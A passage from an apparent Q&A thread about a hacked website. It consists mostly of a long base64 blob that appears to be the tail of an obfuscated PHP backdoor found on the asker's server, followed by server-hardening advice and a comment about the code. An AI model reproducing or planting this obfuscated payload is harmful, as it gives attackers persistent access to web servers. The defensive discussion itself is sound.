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"));
?>
```

**How to lock down your server:**

There are a number of ways this could have gotten on your site.  Most likely you have been hacked using [Exploit Code](http://inj3ct0r.com/) because one of your web applications is out of date.  Try updating everything,  including libraries.   Change passwords for everything,  especially FTP,  although should be using sftp or ftps.

If you control your MySQL server make sure your web application's MySQL user account **is not** `root`,  and make sure you remove MySQL `FILE` privileges from the account.  You should also go a step further and do a `chmod 500 -R /path/to/web/root`  and do a `chown www-data -R /path/to/web/root`  www-data is a common user for apache,  but it might be differnt for your system try running `<?php system("whoami")?>` to figure out the user account.

Next run [phpsecinfo](http://phpsec.org/projects/phpsecinfo/).  Modify your php.ini or .htaccess and remove all RED,  and try and remove as much yellow as possible.

Comment: It is, you can just google for a snippet of the code and find mentions of it all over the place. As he said: "I deleted it, deleted a few suspicious and large files simple called core and reset all my passwords."

